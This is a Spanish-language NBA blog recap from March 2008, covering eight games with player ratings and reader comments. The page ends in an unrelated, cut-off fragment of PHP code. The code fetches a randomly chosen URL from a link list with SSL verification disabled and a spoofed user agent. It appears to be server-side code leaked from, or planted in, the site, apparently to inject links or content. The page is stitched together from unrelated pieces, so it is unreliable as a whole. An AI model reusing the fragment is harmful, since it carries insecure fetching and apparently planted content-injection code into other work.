La crónica (04/03/08)

05 de March de 2008 por telekoman

La jornada nos deparó 8 partidos y ninguna sorpresa. No fué sorpresa que Orlando ganara a Toronto tras la baja de Bosh. Tampoco fue sorpresa que Golden State tuviera que llegar hasta 135 puntos para vencer a Atlanta. No fueron sorpresas las victorias de Detroit y Charlotte sobre Seattle y Minnesota. Así como tampoco fueron sorpresas las victorias de los 3 grandes del Oeste, Lakers, San Antonio y Phoenix.

Pero vamos poco a poco desgranando la jornada en nuestra crónica:

 Por segundo partido consecutivo la baja de Chris Bosh fue un lastre excesivo para los Toronto Raptors que perdieron 102-87 ante Orlando. El irregular Bargnani no pudo hacer de Bosh, ni tampoco Nesterovic y Toronto sólo pudo mantenerse en pie gracias a los 20 puntos de T.J. Ford.y a los 19 de Parker. Calderón confirmó su bajón respecto a semanas pasadas y aunque consiguió 14 puntos, sólo repartió 3 asistencias. Orlando aprovechó la oportunidad con 24 puntos de turkoglu, 22 de Lewis y 19 puntos y 14 rebotes de Howard pese a que no empezó entonado el partido.

JJohnsonLa capacidad anotadora de Golden State se volvió a demostrar en su victoria por 135-118 frente a Atlanta. Los 35 puntos y 9 asistencias de Baron Davis sirvieron para compensar el gran partido de Joe Johnson que anotó 38 puntos y consiguió 7 rebotes y 6 asistencias. Junto a Baron Davis, Stephen Jackson anotó 29 puntos con 6 triples para ser el escudero perfecto.

La salida en tromba en el primer cuarto de Seattle recibiendo a Detroit, anotando 41 puntos, no sirvió para que el joven equipo liderado por Durant se llevase la victoria. La experiencia de la tripleta Billups, Hamilton y Prince fue más que suficiente para conjugar la diferencia y ganar por 100-97. El mejor del equipo de Seattle fue Watson con 23 puntos en lo que parece su segunda (o tercera juventud). Destacar el banquillo de Detroit que, pese a que ninguno llegó a los 10 puntos, todos anotaron excepto Hermann.

Victoria de Charlotte sobre Minnesota por 109-89 con 6 jugadores por encima de 10 puntos. Liderados por Richardson con 25 puntos y Okafor con 19 y 11 rebotes, los Bobcats pudieron con unos débiles Timberwolves en los que nuevamente destacó Jefferson con 18 puntos y 11 rebotes, pero con una mala serie de lanzamientos, 8 de 19.

Victoria casera para Chicago en un partido entre dos de los peores equipos de la NBA, uno en etapa de transición (¿mudanza?) y otro que no se sabe ni dónde está ni dónde quiere llegar.Memphis no empezó mal el partido, anotando sus primeros lanzamientos, para posteriormente entrar en una crisis que hizo que Chicago cogiese una ventaja de 30 puntos. Lowry, Critenton y Milicic intentaron sin éxito eliminar esa distancia llegándose al final con un claro 112-97. Destacar el mal partido de Navarro con sólo 4 puntos en una serie de 1 de 7 y el buen partido de Milicic con 21 puntos. Por Chicago, los mejores fueron Gooden, con 21 puntos y 14 rebotes, y Hinrich con 12 asistencias.Gasol

Cómoda victoria de San Antonio en su cancha frente a New Jersey por 70-81 en la que Duncan destacó mucho por encima de los demás. El pivot tejano se fue hasta los 29 puntos y 12 rebotes y no pudo ser parado en ningún momento. Tan sólo Vince Carter opuso algo de resistencia anotando 19 puntos y cogiendo 9 rebotes. San Antonio sigue en la pugna por el liderato tanto de su División como de la Conferencia llegando a su victoria 42. Mientras tanto New Jersey se complica la vida en su intento de clasificarse para Playoffs.

Parecía que volvía un clásico del Oeste en Sacramento. Ya no estaban Bibby, Stojakovic o Divac pero los Udrih, Martin, Artest y Miller plantearon un partido tenso, bronco.. que recordó esos duelos de hace unos pocos años Onealdonde se jugaban la supremacía del Oeste. El partido fue dominado durante más de 40 minutos por los kings, con Artest, Salmons y Kevin Martin provocando pequeñas ventajas del equipo local e impotencia en el equipo angelino, que se dedicaba a protestar la dureza con la que se empleaban angelitos de la talla de Moore, Artest o Miller. Regular partido de Kobe Bryant pese a los 34 puntos debido a su malísima racha de lanzamiento con sólo 10 anotados de 26 intentos. Buen partido sin embargo de Gasol, 31 puntos y 10 rebotes, y de Odom con 19 puntos y 12 rebotes. El acierto de Kobe reapareció al final del partido para dejar el 117-105 en el marcador, tras anotar 17 puntos en el último cuarto.

Duro partido el jugado en Portland entre Trail Blazers y Suns con dos partes muy diferentes. La primera con claro dominio visitante llegándose al descanso con un claro 60-41, fundamentado en una fuerte defensa y en el dominio del rebote. En la segunda llegó la reacción del equipo de casa con un gran Brandon Roy, autor de 25 puntos, pero no fué suficiente para conjugar totalmente la diferencia, siendo 97-92 el resultado final. Stoudemire con 22 puntos, Nash con 19 y O’Neal con 13 rebotes fueron los mejores para los Suns que quieren recuperar terreno en su lucha por el primer puesto de su División.

Vamos con nuestra sección de jugadores:

MVP: Como nos gustan estas jornadas con grandes actuaciones. Hoy hay que quedarse con la nueva pareja de moda, Pau Gasol y Kobe Bryant, autores de 31 y 34 puntos más 10 rebotes cada uno, con Hedo Turkoglu, Joe Johnson y Jason Richardson, que han acabado sus partidos con actuaciones completísimas, más de 25 puntos, 7 rebotes y 6 asistencias para los 3 y también finalmente con Baron Davis, que se ha ido a los 35 puntos y 9 asistencias. ¡Que grandes estas noches!

Rookie: Al Horford y Kevin Durant siguen su lucha particular por el título de rookie del año. El round de hoy lo ha ganado el de Seattle con una buen acierto en el tiro, 20 puntos, 7 rebotes y 5 asistencias. Hoy destacamos también los partidos de Jared Dudley, que se ha hecho con los minutos de Gerald Wallace y de Javaris Crittenton que confirma en Memphis las buenas sensaciones que dejó en los Lakers.

Sorpresa: Siempre es una buena noticia la vuelta de un jugador de una grave lesión. Nenad Krstic hace partidos que juega pero lo hace muy poco tiempo y a poco gas siguiendo su proceso de recuperación. Por eso los 6 puntos y 10 rebotes de hoy es una alegría para su afición, para la NBA y sobretodo para él. Y para sorpresa los 21 puntos de Milicic.

Decepción: Más vale que Andrea Bargnani empiece a espabilar no sea que se acabe la paciencia en Toronto y se le empiece a considerar un nuevo Kwame Brown. Hoy desde su puesto de pivot titular 2 de 11 en tiros, 6 puntos y 5 rebotes. Otros que han tenido una mala noche han sido el rookie de Memphis Mike Conley, que nota el aliento de Lowry y Crittenton en el cogote y el alero de los Nets Richard Jefferson, que tan solo ha anotado 10 puntos en la derrota de su equipo.

Y como siempre os dejamos con las 10 mejores jugadas.

Comenta

8 comentarios a esta entrada

  1. Gallis dice:
    #1

    Con Kobe y Pau por encima de 30, los Lakers son imparables…el problema es que los Spurs parecen más imparables, jojojojo…

    Lo de Phoenix sigue sin convencerme.

      Citar

  2. txusma dice:
    #2

    Mas vale morir de pie que vivir de rodillas… Vamos que si crees en una idea lucha por ella y mantenla hasta el final pero claro con Shaq eso no es posible.

      Citar

  3. MagicJohnson32 dice:
    #3

    La verdad es que lo de los Spurs es admirable. Huelen a Playoffs y se ponen a ganar partidos como locos.

    Sobre el partido de anoche… como dijo Gasol, cuando Lakers iba 13 abajo y la cosa pintaba mal, Kobe se lo tomó como algo personal.

    17 puntos en los últimos 5 minutos. Juas.

      Citar

  4. Dantley dice:
    #4

    Es que cada día que pasa se ve más que lo de Shaq ha sido una metedura de pata. No están más cerca del título y no por Marion que es el típico jugador cuyo impacto es mucho menor al que dicen sus números, sino porque Shaq no encaja.

    Dudley. Va a tener una carrera larga. Muy aplicado en todo. Aunque no creo que pase de actor secundario.

      Citar

  5. Jabho dice:
    #5

    Los Spurs son un equipo muy cuajado y muy seguro en si mismo. Si llegan bien de salud son dificles de ganar. Y aun deben incorporar a Barry que se asiente Thomas… huela a Spurs -LAL el Oeste

      Citar

  6. Olafur dice:
    #6

    Pues a mi me huele que este año los Spurs a pesar de que Kurt les vendrá bien, no llegan a final de conferencia, es más creo que va a haber alguna sorpresa y equipos como New Orleans o Utah la pueden armar.

      Citar

  7. MagicJohnson32 dice:
    #7

    Es difícil que un equipo como los Hornets, sin experiencia, llegue tan lejos. Los Jazz están más hechos, y Deron va a más. La cosa es que en el Oeste cualquiera te la lía.

    Qué bonito se presenta.

      Citar

  8. Viva_Dirk dice:
    #8

    Desde luego los Jazzs parecen ser una gran alternativa a los grandes de la conferencia, lo tienen todo, dependerá de como se apliquen para parar a los interiores mas poderosos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>